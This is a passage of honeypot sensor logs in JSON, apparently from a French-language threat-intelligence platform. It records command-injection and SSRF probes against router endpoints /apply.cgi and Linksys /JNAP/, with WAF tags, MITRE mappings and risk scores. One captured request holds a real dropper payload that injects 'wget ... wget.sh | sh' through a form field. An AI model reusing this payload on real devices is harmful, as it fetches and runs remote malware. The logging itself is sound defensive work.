\u0022rce-5\u0022, \u0022ssrf-3\u0022, \u0022nosqli-3\u0022], \u0022request_line\u0022: \u0022POST \/apply.cgi HTTP\/1.1\u0022, \u0022request_sample\u0022: \u0022POST \/apply.cgi HTTP\/1.1\\r\\nHost: 62.3.50.33:81\\r\\nContent-Type: application\/x-www-form-urlencoded\\r\\nContent-Length: 243\\r\\nConnection: close\\r\\n\\r\\nwl_ssid=cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20lwizard%3Bbusybox%20wget%20http:\/\/91.92.40.11\u0022, \u0022payload_snippet\u0022: \u0022POST \/apply.cgi HTTP\/1.1\\r\\nHost: 62.3.50.33:81\\r\\nContent-Type: application\/x-www-form-urlencoded\\r\\nContent-Length: 243\\r\\nConnection:\u0022, \u0022classification_reason\u0022: \u0022Motif SSRF \u00b7 confiance 95%\u0022}, \u0022attack_stage\u0022: \u0022exploit_attempt\u0022, \u0022mitre_tactics\u0022: [\u0022TA0001\u0022, \u0022TA0002\u0022], \u0022mitre\u0022: \u0022TA0001\u0022, \u0022threat_family\u0022: [\u0022web_injection\u0022, \u0022ssrf_probe\u0022], \u0022recommended_client_action\u0022: \u0022investigate\u0022, \u0022policy_mode\u0022: \u0022intelligence\u0022, \u0022sensor_role\u0022: \u0022threat_intelligence\u0022, \u0022event_signature\u0022: \u0022ccec524bc861f783af50b2e605e78435c3fa3501\u0022, \u0022protocol_details\u0022: {\u0022http_method\u0022: \u0022POST\u0022, \u0022http_path\u0022: \u0022\/apply.cgi\u0022, \u0022request_line\u0022: \u0022POST \/apply.cgi HTTP\/1.1\u0022, \u0022port\u0022: 81, \u0022service\u0022: \u0022http\u0022, \u0022service_label_fr\u0022: \u0022HTTP\u0022}, \u0022evidence_snippet\u0022: \u0022POST \/apply.cgi HTTP\/1.1\\r\\nHost: 62.3.50.33:81\\r\\nContent-Type: application\/x-www-form-urlencoded\\r\\nContent-Length: 243\\r\\nConnection:\u0022, \u0022attack_vector\u0022: \u0022http smuggling probe \u00b7 via HTTP:81 \u00b7 (tentative d\u0027exploit) \u00b7 \u2192 \/apply.cgi\u0022, \u0022target_port_label\u0022: \u002281 \u00b7 HTTP\u0022, \u0022emulator_service\u0022: \u0022http\u0022, \u0022confidence_reason\u0022: \u0022Confiance 95 % \u2014 Motif catalogue confirm\u00e9 \u00b7 5 tag(s) WAF\u0022, \u0022site_display\u0022: {\u0022classification\u0022: null, \u0022classification_reason\u0022: \u0022Motif SSRF \u00b7 confiance 95%\u0022, \u0022classification_reason_label_fr\u0022: \u0022Motif SSRF \u00b7 confiance 95%\u0022, \u0022executive_one_liner_fr\u0022: \u0022Activit\u00e9 suspecte \u2014 risque 79\/100 (\u00c9lev\u00e9) \u2014 MITRE TA0001 \u2014 confiance 95 % \u2014 via HTTP\u0022, \u0022confidence_pct\u0022: 95, \u0022confidence_breakdown\u0022: {\u0022waf\u0022: 100.0, \u0022classification\u0022: 85.0, \u0022behavior\u0022: 0.0, \u0022geo\u0022: 0.0, \u0022protocol\u0022: 43.0, \u0022novelty\u0022: 25.0, \u0022risk_score\u0022: 79}, \u0022attack_stage\u0022: \u0022exploit_attempt\u0022, \u0022attack_stage_label\u0022: \u0022Tentative d\u0027exploit\u0022, \u0022attack_chain_stage\u0022: \u0022exploitation\u0022, \u0022attack_chain_stage_label_fr\u0022: \u0022Exploitation\u0022, \u0022risk_score\u0022: 79, \u0022risk_label\u0022: \u0022\u00c9lev\u00e9\u0022, \u0022service_name\u0022: \u0022http\u0022, \u0022service_label_fr\u0022: \u0022HTTP\u0022, \u0022dst_port\u0022: 81, \u0022protocol_emulated\u0022: true, \u0022tags_summary\u0022: [\u0022pat-0842\u0022], \u0022tags_summary_labels_fr\u0022: [\u0022pat-0842\u0022], \u0022recommended_action\u0022: \u0022investigate\u0022, \u0022recommended_action_label\u0022: \u0022Investiguer\u0022, \u0022mitre\u0022: \u0022TA0001\u0022, \u0022mitre_technique\u0022: \u0022TA0001\u0022, \u0022persona_hostname\u0022: \u0022mail.sensor-1.internal\u0022, \u0022persona_service_banner\u0022: \u0022honeypot-http\u0022, \u0022correlation_flags\u0022: null, \u0022correlation_flags_labels_fr\u0022: null, \u0022sensor_role\u0022: \u0022threat_intelligence\u0022, \u0022sensor_role_label_fr\u0022: \u0022Renseignement menaces\u0022, \u0022confidence_hint_fr\u0022: null, \u0022protocol_details\u0022: {\u0022http_method\u0022: \u0022POST\u0022, \u0022http_path\u0022: \u0022\/apply.cgi\u0022, \u0022request_line\u0022: \u0022POST \/apply.cgi HTTP\/1.1\u0022, \u0022port\u0022: 81, \u0022service\u0022: \u0022http\u0022, \u0022service_label_fr\u0022: \u0022HTTP\u0022}, \u0022attack_vector\u0022: \u0022http smuggling probe \u00b7 via HTTP:81 \u00b7 (tentative d\u0027exploit) \u00b7 \u2192 \/apply.cgi\u0022, \u0022evidence_snippet\u0022: \u0022POST \/apply.cgi HTTP\/1.1\\r\\nHost: 62.3.50.33:81\\r\\nContent-Type: application\/x-www-form-urlencoded\\r\\nContent-Length: 243\\r\\nConnection:\u0022, \u0022target_port_label\u0022: \u002281 \u00b7 HTTP\u0022, \u0022emulator_service\u0022: \u0022http\u0022, \u0022confidence_reason\u0022: \u0022Confiance 95 % \u2014 Motif catalogue confirm\u00e9 \u00b7 5 tag(s) WAF\u0022, \u0022confidence_factors_fr\u0022: \u0022Confiance 95 % \u2014 Score WAF 100 \u00b7 5 tag(s) WAF\u0022, \u0022campaign_hint_fr\u0022: null, \u0022attack_phases_timeline_fr\u0022: [{\u0022key\u0022: \u0022recon\u0022, \u0022label_fr\u0022: \u0022Reconnaissance\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022probe\u0022, \u0022label_fr\u0022: \u0022Sonde \/ probe\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022exploit_attempt\u0022, \u0022label_fr\u0022: \u0022Tentative d\u0027exploit\u0022, \u0022active\u0022: true, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022post_exploit\u0022, \u0022label_fr\u0022: \u0022Post-exploitation\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022c2\u0022, \u0022label_fr\u0022: \u0022Commande \u0026 contr\u00f4le\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022exploitation\u0022, \u0022label_fr\u0022: \u0022Exploitation\u0022, \u0022active\u0022: true, \u0022kind\u0022: \u0022chain\u0022, \u0022hint_fr\u0022: null}]}, \u0022honeypot_persona\u0022: {\u0022sensor_id\u0022: \u0022sensor-1\u0022, \u0022hostname\u0022: \u0022mail.sensor-1.internal\u0022, \u0022mail_host\u0022: \u0022mail.sensor-1.internal\u0022, \u0022ldap_dc\u0022: \u0022dc.sensor-1.internal\u0022, \u0022k8s_cluster\u0022: \u0022hp-sensor-1\u0022, \u0022domain\u0022: \u0022sensor-1.internal\u0022, \u0022service_role\u0022: \u0022http\u0022, \u0022service_banner\u0022: \u0022honeypot-http\u0022, \u0022service_os\u0022: \u0022linux\u0022, \u0022dst_port\u0022: \u002281\u0022}, \u0022hostname\u0022: \u0022mail.sensor-1.internal\u0022, \u0022sensor_id\u0022: \u0022sensor-1\u0022, \u0022attack_chain_stage\u0022: \u0022exploitation\u0022, \u0022ban_policy\u0022: \u0022advisory_investigate\u0022, \u0022tags_list\u0022: [\u0022950311:lfi-12\u0022, \u0022950327:rce-0\u0022, \u0022950347:rce-5\u0022, \u0022950407:ssrf-3\u0022, \u0022950471:nosqli-3\u0022, \u0022http_jwt_body\u0022, \u0022http_no_ua\u0022, \u0022http_ssrf_body\u0022, \u0022net_web_probe\u0022]}","tls_sni":null,"tls_ja3_hash":null,"tls_ja3":null,"http_version":"HTTP\/1.1","http_host":"62.3.50.33:81","http_user_agent":null,"http_referer":null,"tags":"[\u0022950311:lfi-12\u0022, \u0022950327:rce-0\u0022, \u0022950347:rce-5\u0022, \u0022950407:ssrf-3\u0022, \u0022950471:nosqli-3\u0022, \u0022http_jwt_body\u0022, \u0022http_no_ua\u0022, \u0022http_ssrf_body\u0022, \u0022net_web_probe\u0022]","anomalies":"[]","severity":10,"bytes_in":381},{"id":11860751,"ip":"45.156.87.213","ts":"2026-07-14 08:22:33.000000","proto":"tcp","src_port":59750,"dst_port":81,"service":"http","classification":"cmd_injection","waf_score":66,"waf_tags":"[\u0022950311:lfi-12\u0022, \u0022950326:rce-0\u0022, \u0022950327:rce-0\u0022, \u0022950335:rce-2\u0022, \u0022950347:rce-5\u0022, \u0022950406:ssrf-3\u0022, \u0022950407:ssrf-3\u0022, \u0022950468:nosqli-3\u0022, \u0022950470:nosqli-3\u0022, \u0022950471:nosqli-3\u0022]","http_method":"POST","http_target":"\/JNAP\/","sensor_id":"paris-1","meta":"{\u0022protocol_emulated\u0022: true, \u0022emulator_response\u0022: \u0022485454502f312e3120323030204f4b0d0a5365727665723a204170616368652f322e342e35370d0a436f6e74656e742d4c656e6774683a20320d0a436f6e6e656374696f6e3a20636c6f73650d0a0d0a4f4b\u0022, \u0022emulator_response_len\u0022: 82, \u0022http_header_count\u0022: 5, \u0022http_query_params\u0022: 0, \u0022http_path_depth\u0022: 1, \u0022http_path_ext\u0022: null, \u0022http_ua_hash\u0022: null, \u0022http_host_hash\u0022: \u0022f257870e26046e30cbd03e9d5726ca53aa58b86f\u0022, \u0022http_target_hash\u0022: \u00221590bac5c7d7e8540ab87881f47e89fa381ce665\u0022, \u0022http_referer_hash\u0022: null, \u0022http_method\u0022: \u0022POST\u0022, \u0022http_ua_is_cli\u0022: false, \u0022http_ua_is_browser\u0022: false, \u0022bytes_in\u0022: 426, \u0022payload_entropy\u0022: 5.364613279960881, \u0022port_category\u0022: \u0022well_known\u0022, \u0022org\u0022: \u0022TechTies Inc.\u0022, \u0022service\u0022: \u0022http\u0022, \u0022app_proto\u0022: \u0022http\u0022, \u0022asn\u0022: 197170, \u0022country\u0022: \u0022NL\u0022, \u0022dst_port\u0022: 81, \u0022risk_waf\u0022: 100.0, \u0022risk_classification\u0022: 85.0, \u0022risk_behavior\u0022: 0.0, \u0022risk_geo\u0022: 0.0, \u0022risk_protocol\u0022: 43.0, \u0022risk_novelty\u0022: 25.0, \u0022risk_boost\u0022: 15, \u0022risk_granularity\u0022: 6.0, \u0022risk_breakdown\u0022: {\u0022waf\u0022: 100.0, \u0022classification\u0022: 85.0, \u0022behavior\u0022: 0.0, \u0022geo\u0022: 0.0, \u0022protocol\u0022: 43.0, \u0022novelty\u0022: 25.0}, \u0022risk_score\u0022: 81, \u0022tag_count\u0022: 15, \u0022anomaly_count\u0022: 0, \u0022campaign_key\u0022: \u0022945a99d6bd486f2859e2e05cd8fd2a4513ab46fb\u0022, \u0022event_fingerprint\u0022: \u002295f10306677b4c8a86d0a637725f6b67be418db1\u0022, \u0022classification_reason\u0022: \u0022Injection de commande (tag lfi-12) \u00b7 Injection commande dans la requ\u00eate \u00b7 confiance 100%\u0022, \u0022confidence\u0022: 1.0, \u0022classification_confidence\u0022: 1.0, \u0022precision_score\u0022: 142, \u0022precision_signals\u0022: [\u0022INT-http_cmdi\u0022, \u0022pat-0146\u0022], \u0022kb_rule_ids\u0022: [\u0022INT-http_cmdi\u0022, \u0022pat-0146\u0022], \u0022matched_patterns\u0022: [\u0022pat-0842\u0022, \u0022pat-0146\u0022, \u0022pat-0103\u0022], \u0022matched_pattern_names\u0022: [\u0022CRS 921130 duplicate CL\u0022, \u0022CRS 932205\u0022, \u0022LFI Double-dot bypass\u0022], \u0022pattern_ids\u0022: [\u0022pat-0842\u0022, \u0022pat-0146\u0022, \u0022pat-0103\u0022], \u0022confidence_breakdown\u0022: {\u0022waf\u0022: 100.0, \u0022classification\u0022: 85.0, \u0022behavior\u0022: 0.0, \u0022geo\u0022: 0.0, \u0022protocol\u0022: 43.0, \u0022novelty\u0022: 25.0, \u0022risk_score\u0022: 81}, \u0022named_classification_skipped\u0022: false, \u0022service_name\u0022: \u0022http\u0022, \u0022risk_confidence_factor\u0022: 100.0, \u0022city\u0022: null, \u0022is_datacenter\u0022: false, \u0022is_tor_hint\u0022: false, \u0022geo\u0022: {\u0022country\u0022: \u0022NL\u0022, \u0022asn\u0022: 197170, \u0022org\u0022: \u0022TechTies Inc.\u0022, \u0022is_datacenter\u0022: false, \u0022is_tor_hint\u0022: false}, \u0022fingerprint\u0022: {\u0022payload_hash\u0022: \u00224ff8e6337cde3b7949ec2d66513ed323\u0022, \u0022path_pattern_hash\u0022: \u002209d793525e81db3cecc4e36c738b6310\u0022}, \u0022target_context\u0022: {\u0022dst_port\u0022: 81, \u0022service\u0022: \u0022http\u0022, \u0022service_name\u0022: \u0022http\u0022, \u0022risk_score\u0022: 81}, \u0022payload_preview\u0022: \u0022POST \/JNAP\/ HTTP\/1.1\\r\\nHost: 62.3.50.33:81\\r\\nContent-Type: application\/json; charset=utf-8\\r\\nX-JNAP-Action: http:\/\/linksys.com\/jnap\u0022, \u0022method\u0022: \u0022POST\u0022, \u0022path\u0022: \u0022\/JNAP\/\u0022, \u0022waf_tags\u0022: [\u0022950311:lfi-12\u0022, \u0022950326:rce-0\u0022, \u0022950327:rce-0\u0022, \u0022950335:rce-2\u0022, \u0022950347:rce-5\u0022, \u0022950406:ssrf-3\u0022, \u0022950407:ssrf-3\u0022, \u0022950468:nosqli-3\u0022, \u0022950470:nosqli-3\u0022, \u0022950471:nosqli-3\u0022], \u0022waf_rule_names\u0022: [\u0022lfi-12\u0022, \u0022rce-0\u0022, \u0022rce-2\u0022, \u0022rce-5\u0022, \u0022ssrf-3\u0022, \u0022nosqli-3\u0022], \u0022request_line\u0022: \u0022POST \/JNAP\/ HTTP\/1.1\u0022, \u0022request_sample\u0022: \u0022POST \/JNAP\/ HTTP\/1.1\\r\\nHost: 62.3.50.33:81\\r\\nContent-Type: application\/json; charset=utf-8\\r\\nX-JNAP-Action: http:\/\/linksys.com\/jnap\/setup\/SetupWizard\\r\\nContent-Length: 236\\r\\nConnection: close\\r\\n\\r\\n{\\\u0022JNAP\\\u0022:{\\\u0022action\\\u0022:\\\u0022http:\/\/linksys.com\/jnap\/setup\/SetupWizard\\\u0022,\\\u0022com\u0022, \u0022payload_snippet\u0022: \u0022POST \/JNAP\/ HTTP\/1.1\\r\\nHost: 62.3.50.33:81\\r\\nContent-Type: application\/json; charset=utf-8\\r\\nX-JNAP-Action: http:\/\/linksys.com\/jnap\u0022, \u0022evidence\u0022: {\u0022method\u0022: \u0022POST\u0022, \u0022path\u0022: \u0022\/JNAP\/\u0022, \u0022waf_tags\u0022: [\u0022950311:lfi-12\u0022, \u0022950326:rce-0\u0022, \u0022950327:rce-0\u0022, \u0022950335:rce-2\u0022, \u0022950347:rce-5\u0022, \u0022950406:ssrf-3\u0022, \u0022950407:ssrf-3\u0022, \u0022950468:nosqli-3\u0022, \u0022950470:nosqli-3\u0022, \u0022950471:nosqli-3\u0022], \u0022waf_rule_names\u0022: [\u0022lfi-12\u0022, \u0022rce-0\u0022, \u0022rce-2\u0022, \u0022rce-5\u0022, \u0022ssrf-3\u0022, \u0022nosqli-3\u0022], \u0022request_line\u0022: \u0022POST \/JNAP\/ HTTP\/1.1\u0022, \u0022request_sample\u0022: \u0022POST \/JNAP\/ HTTP\/1.1\\r\\nHost: 62.3.50.33:81\\r\\nContent-Type: application\/json; charset=utf-8\\r\\nX-JNAP-Action: http:\/\/linksys.com\/jnap\/setup\/SetupWizard\\r\\nContent-Length: 236\\r\\nConnection: close\\r\\n\\r\\n{\\\u0022JNAP\\\u0022:{\\\u0022action\\\u0022:\\\u0022http:\/\/linksys.com\/jnap\/setup\/SetupWizard\\\u0022,\\\u0022com\u0022, \u0022payload_snippet\u0022: \u0022POST \/JNAP\/ HTTP\/1.1\\r\\nHost: 62.3.50.33:81\\r\\nContent-Type: application\/json; charset=utf-8\\r\\nX-JNAP-Action: http:\/\/linksys.com\/jnap\u0022, \u0022classification_reason\u0022: \u0022Injection de commande (tag lfi-12) \u00b7 Injection commande dans la requ\u00eate \u00b7 confiance 100%\u0022}, \u0022attack_stage\u0022: \u0022exploit_attempt\u0022, \u0022mitre_tactics\u0022: [\u0022TA0001\u0022, \u0022TA0002\u0022], \u0022mitre_techniques\u0022: [\u0022T1059\u0022, \u0022T1190\u0022], \u0022mitre\u0022: \u0022T1059\u0022, \u0022threat_family\u0022: [\u0022rce_probe\u0022, \u0022ssrf_probe\u0022], \u0022recommended_client_action\u0022: \u0022investigate\u0022, \u0022policy_mode\u0022: \u0022intelligence\u0022, \u0022sensor_role\u0022: \u0022threat_intelligence\u0022, \u0022event_signature\u0022: \u0022c523b2b1e7ec7220557cf4fd2f72a3c7ba0f4afa\u0022, \u0022protocol_details\u0022: {\u0022http_method\u0022: \u0022POST\u0022, \u0022http_path\u0022: \u0022\/JNAP\/\u0022, \u0022request_line\u0022: \u0022POST \/JNAP\/ HTTP\/1.1\u0022, \u0022port\u0022: 81, \u0022service\u0022: \u0022http\u0022, \u0022service_label_fr\u0022: \u0022HTTP\u0022}, \u0022evidence_snippet\u0022: \u0022POST \/JNAP\/ HTTP\/1.1\\r\\nHost: 62.3.50.33:81\\r\\nContent-Type: application\/json; charset=utf-8\\r\\nX-JNAP-Action: http:\/\/linksys.com\/jnap\u0022, \u0022attack_vector\u0022: \u0022cmd injection \u00b7 via HTTP:81 \u00b7 (tentative d\u0027exploit) \u00b7 \u2192 \/JNAP\/\u0022, \u0022target_port_label\u0022: \u002281 \u00b7 HTTP\u0022, \u0022emulator_service\u0022: \u0022http\u0022, \u0022confidence_reason\u0022: \u0022Confiance 100 % \u2014 Preuve dans le payload \u00b7 Motif catalogue confirm\u00e9\u0022, \u0022site_display\u0022: {\u0022classification\u0022: null, \u0022classification_reason\u0022: \u0022Injection de commande (tag lfi-12) \u00b7 Injection commande dans la requ\u00eate \u00b7 confiance 100%\u0022, \u0022classification_reason_label_fr\u0022: \u0022Injection de commande (tag lfi-12) \u00b7 Injection commande dans la requ\u00eate \u00b7 confiance 100%\u0022, \u0022executive_one_liner_fr\u0022: \u0022Activit\u00e9 suspecte \u2014 risque 81\/100 (\u00c9lev\u00e9) \u2014 MITRE T1059 \u2014 confiance 100 % \u2014 via HTTP\u0022, \u0022confidence_pct\u0022: 100, \u0022confidence_breakdown\u0022: {\u0022waf\u0022: 100.0, \u0022classification\u0022: 85.0, \u0022behavior\u0022: 0.0, \u0022geo\u0022: 0.0, \u0022protocol\u0022: 43.0, \u0022novelty\u0022: 25.0, \u0022risk_score\u0022: 81}, \u0022attack_stage\u0022: \u0022exploit_attempt\u0022, \u0022attack_stage_label\u0022: \u0022Tentative d\u0027exploit\u0022, \u0022attack_chain_stage\u0022: \u0022exploitation\u0022, \u0022attack_chain_stage_label_fr\u0022: \u0022Exploitation\u0022, \u0022risk_score\u0022: 81, \u0022risk_label\u0022: \u0022\u00c9lev\u00e9\u0022, \u0022service_name\u0022: \u0022http\u0022, \u0022service_label_fr\u0022: \u0022HTTP\u0022, \u0022dst_port\u0022: 81, \u0022protocol_emulated\u0022: true, \u0022tags_summary\u0022: [\u0022INT-http_cmdi\u0022, \u0022pat-0146\u0022], \u0022tags_summary_labels_fr\u0022: [\u0022Http Cmdi\u0022, \u0022pat-0146\u0022], \u0022recommended_action\u0022: \u0022investigate\u0022, \u0022recommended_action_label\u0022: \u0022Investiguer\u0022, \u0022mitre\u0022: \u0022T1059\u0022, \u0022mitre_technique\u0022: \u0022T1059\u0022, \u0022persona_hostname\u0022: \u0022mail.sensor-1.internal\u0022, \u0022persona_service_banner\u0022: \u0022honeypot-http\u0022, \u0022correlation_flags\u0022: null, \u0022correlation_flags_labels_fr\u0022: null, \u0022sensor_role\u0022: \u0022threat_intelligence\u0022, \u0022sensor_role_label_fr\u0022: \u0022Renseignement menaces\u0022, \u0022confidence_hint_fr\u0022: null, \u0022protocol_details\u0022: {\u0022http_method\u0022: \u0022POST\u0022, \u0022http_path\u0022: \u0022\/JNAP\/\u0022, \u0022request_line\u0022: \u0022POST \/JNAP\/ HTTP\/1.1\u0022, \u0022port\u0022: 81, \u0022service\u0022: \u0022http\u0022, \u0022service_label_fr\u0022: \u0022HTTP\u0022}, \u0022attack_vector\u0022: \u0022cmd injection \u00b7 via HTTP:81 \u00b7 (tentative d\u0027exploit) \u00b7 \u2192 \/JNAP\/\u0022, \u0022evidence_snippet\u0022: \u0022POST \/JNAP\/ HTTP\/1.1\\r\\nHost: 62.3.50.33:81\\r\\nContent-Type: application\/json; charset=utf-8\\r\\nX-JNAP-Action: http:\/\/linksys.com\/jnap\u0022, \u0022target_port_label\u0022: \u002281 \u00b7 HTTP\u0022, \u0022emulator_service\u0022: \u0022http\u0022, \u0022confidence_reason\u0022: \u0022Confiance 100 % \u2014 Preuve dans le payload \u00b7 Motif catalogue confirm\u00e9\u0022, \u0022confidence_factors_fr\u0022: \u0022Confiance 100 % \u2014 Score WAF 100 \u00b7 10 tag(s) WAF\u0022, \u0022campaign_hint_fr\u0022: null, \u0022attack_phases_timeline_fr\u0022: [{\u0022key\u0022: \u0022recon\u0022, \u0022label_fr\u0022: \u0022Reconnaissance\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022probe\u0022, \u0022label_fr\u0022: \u0022Sonde \/ probe\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022exploit_attempt\u0022, \u0022label_fr\u0022: \u0022Tentative d\u0027exploit\u0022, \u0022active\u0022: true, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022post_exploit\u0022, \u0022label_fr\u0022: \u0022Post-exploitation\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022c2\u0022, \u0022label_fr\u0022: \u0022Commande \u0026 contr\u00f4le\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022exploitation\u0022, \u0022label_fr\u0022: \u0022Exploitation\u0022, \u0022active\u0022: true, \u0022kind\u0022: \u0022chain\u0022, \u0022hint_fr\u0022: null}]}, \u0022honeypot_persona\u0022: {\u0022sensor_id\u0022: \u0022sensor-1\u0022, \u0022hostname\u0022: \u0022mail.sensor-1.internal\u0022, \u0022mail_host\u0022: \u0022mail.sensor-1.internal\u0022, \u0022ldap_dc\u0022: \u0022dc.sensor-1.internal\u0022, \u0022k8s_cluster\u0022: \u0022hp-sensor-1\u0022, \u0022domain\u0022: \u0022sensor-1.internal\u0022, \u0022service_role\u0022: \u0022http\u0022, \u0022service_banner\u0022: \u0022honeypot-http\u0022, \u0022service_os\u0022: \u0022linux\u0022, \u0022dst_port\u0022: \u002281\u0022}, \u0022hostname\u0022: \u0022mail.sensor-1.internal\u0022, \u0022sensor_id\u0022: \u0022sensor-1\u0022, \u0022attack_chain_stage\u0022: \u0022exploitation\u0022, \u0022ban_policy\u0022: \u0022advisory_investigate\u0022, \u0022tags_list\u0022: [\u0022950311:lfi-12\u0022, \u0022950326:rce-0\u0022, \u0022950327:rce-0\u0022, \u0022950335:rce-2\u0022, \u0022950347:rce-5\u0022, \u0022950406:ssrf-3\u0022, \u0022950407:ssrf-3\u0022, \u0022950468:nosqli-3\u0022, \u0022950470:nosqli-3\u0022, \u0022950471:nosqli-3\u0022, \u0022http_cmd_injection\u0022, \u0022http_jwt_body\u0022, \u0022http_no_ua\u0022, \u0022http_ssrf_body\u0022, \u0022net_web_probe\u0022]}","tls_sni":null,"tls_ja3_hash":null,"tls_ja3":null,"http_version":"HTTP\/1.1","http_host":"62.3.50.33:81","http_user_agent":null,"http_referer":null,"tags":"[\u0022950311:lfi-12\u0022, \u0022950326:rce-0\u0022, \u0022950327:rce-0\u0022, \u0022950335:rce-2\u0022, \u0022950347:rce-5\u0022, \u0022950406:ssrf-3\u0022, \u0022950407:ssrf-3\u0022, \u0022950468:nosqli-3\u0022, \u0022950470:nosqli-3\u0022, \u0022950471:nosqli-3\u0022, \u0022http_cmd_injection\u0022, \u0022http_jwt_body\u0022, \u0022http_no_ua\u0022, \u0022http_ssrf_body\u0022, \u0022net_web_probe\u0022]","anomalies":"[]","severity":10,"bytes_in":426},{"id":11860752,"ip":"45.156.87.213","ts":"2026-07-14 08:22:33.000000","proto":"tcp","src_port":59752,"dst_port":81,"service":"http","classification":"cmd_injection","waf_score":72,"waf_tags":"[\u0022950311:lfi-12\u0022, \u0022950326:rce-0\u0022, \u0022950327:rce-0\u0022, \u0022950335:rce-2\u0022, \u0022950347:rce-5\u0022, \u0022950403:ssrf-2\u0022, \u0022950406:ssrf-3\u0022, \u0022950407:ssrf-3\u0022, \u0022950468:nosqli-3\u0022, \u0022950470:nosqli-3\u0022, \u0022950471:nosqli-3\u0022]","http_method":"POST","http_target":"\/JNAP\/","sensor_id":"paris-1","meta":"{\u0022protocol_emulated\u0022: true, \u0022emulator_response\u0022: \u0022485454502f312e3120323030204f4b0d0a5365727665723a204170616368652f322e342e35370d0a436f6e74656e742d4c656e6774683a20320d0a436f6e6e656374696f6e3a20636c6f73650d0a0d0a4f4b\u0022, \u0022emulator_response_len\u0022: 82, \u0022http_header_count\u0022: 5, \u0022http_query_params\u0022: 0, \u0022http_path_depth\u0022: 1, \u0022http_path_ext\u0022: null, \u0022http_ua_hash\u0022: null, \u0022http_host_hash\u0022: \u0022f257870e26046e30cbd03e9d5726ca53aa58b86f\u0022, \u0022http_target_hash\u0022: \u00221590bac5c7d7e8540ab87881f47e89fa381ce665\u0022, \u0022http_referer_hash\u0022: null, \u0022http_method\u0022: \u0022POST\u0022, \u0022http_ua_is_cli\u0022: false, \u0022http_ua_is_browser\u0022: false, \u0022bytes_in\u0022: 461, \u0022payload_entropy\u0022: 5.345785309202877, \u0022port_category\u0022: \u0022well_known\u0022, \u0022org\u0022: \u0022TechTies Inc.\u0022, \u0022service\u0022: \u0022http\u0022, \u0022app_proto\u0022: \u0022http\u0022, \u0022asn\u0022: 197170, \u0022country\u0022: \u0022NL\u0022, \u0022dst_port\u0022: 81, \u0022risk_waf\u0022: 100.0, \u0022risk_classification\u0022: 85.0, \u0022risk_behavior\u0022: 0.0, \u0022risk_geo\u0022: 0.0, \u0022risk_protocol\u0022: 43.0, \u0022risk_novelty\u0022: 25.0, \u0022risk_boost\u0022: 15, \u0022risk_granularity\u0022: 6.0, \u0022risk_breakdown\u0022: {\u0022waf\u0022: 100.0, \u0022classification\u0022: 85.0, \u0022behavior\u0022: 0.0, \u0022geo\u0022: 0.0, \u0022protocol\u0022: 43.0, \u0022novelty\u0022: 25.0}, \u0022risk_score\u0022: 81, \u0022tag_count\u0022: 16, \u0022anomaly_count\u0022: 0, \u0022campaign_key\u0022: \u0022b76f07bbbce80d6025de0a46cac54e620aaab39d\u0022, \u0022event_fingerprint\u0022: \u002295f10306677b4c8a86d0a637725f6b67be418db1\u0022, \u0022classification_reason\u0022: \u0022Injection de commande (tag lfi-12) \u00b7 Injection commande dans la requ\u00eate \u00b7 confiance 100%\u0022, \u0022confidence\u0022: 1.0, \u0022classification_confidence\u0022: 1.0, \u0022precision_score\u0022: 142, \u0022precision_signals\u0022: [\u0022INT-http_cmdi\u0022, \u0022pat-0146\u0022], \u0022kb_rule_ids\u0022: [\u0022INT-http_cmdi\u0022, \u0022pat-0146\u0022], \u0022matched_patterns\u0022: [\u0022pat-0842\u0022, \u0022pat-0146\u0022, \u0022pat-0103\u0022], \u0022matched_pattern_names\u0022: [\u0022CRS 921130 duplicate CL\u0022, \u0022CRS 932205\u0022, \u0022LFI Double-dot bypass\u0022], \u0022pattern_ids\u0022: [\u0022pat-0842\u0022, \u0022pat-0146\u0022, \u0022pat-0103\u0022], \u0022confidence_breakdown\u0022: {\u0022waf\u0022: 100.0, \u0022classification\u0022: 85.0, \u0022behavior\u0022: 0.0, \u0022geo\u0022: 0.0, \u0022protocol\u0022: 43.0, \u0022novelty\u0022: 25.0, \u0022risk_score\u0022: 81}, \u0022named_classification_skipped\u0022: false, \u0022service_name\u0022: \u0022http\u0022, \u0022risk_confidence_factor\u0022: 100.0, \u0022city\u0022: null, \u0022is_datacenter\u0022: false, \u0022is_tor_hint\u0022: false, \u0022geo\u0022: {\u0022country\u0022: \u0022NL\u0022, \u0022asn\u0022: 197170, \u0022org\u0022: \u0022TechTies Inc.\u0022, \u0022is_datacenter\u0022: false, \u0022is_tor_hint\u0022: false}, \u0022fingerprint\u0022: {\u0022payload_hash\u0022: \u0022e829c73f7bdbeaca6f101378a827d277\u0022, \u0022path_pattern_hash\u0022: \u002209d793525e81db3cecc4e36c738b6310\u0022}, \u0022target_context\u0022: {\u0022dst_port\u0022: 81, \u0022service\u0022: \u0022http\u0022, \u0022service_name\u0022: \u0022http\u0022, \u0022risk_score\u0022: 81}, \u0022payload_preview\u0022: \u0022POST \/JNAP\/ HTTP\/1.1\\r\\nHost: 62.3.50.33:81\\r\\nContent-Type: application\/json; charset=utf-8\\r\\nX-JNAP-Action: http:\/\/linksys.com\/jnap\u0022, \u0022method\u0022: \u0022POST\u0022, \u0022path\u0022: \u0022\/JNAP\/\u0022, \u0022waf_tags\u0022: [\u0022950311:lfi-12\u0022, \u0022950326:rce-0\u0022, \u0022950327:rce-0\u0022, \u0022950335:rce-2\u0022, \u0022950347:rce-5\u0022, \u0022950403:ssrf-2\u0022, \u0022950406:ssrf-3\u0022, \u0022950407:ssrf-3\u0022, \u0022950468:nosqli-3\u0022, \u0022950470:nosqli-3\u0022, \u0022950471:nosqli-3\u0022], 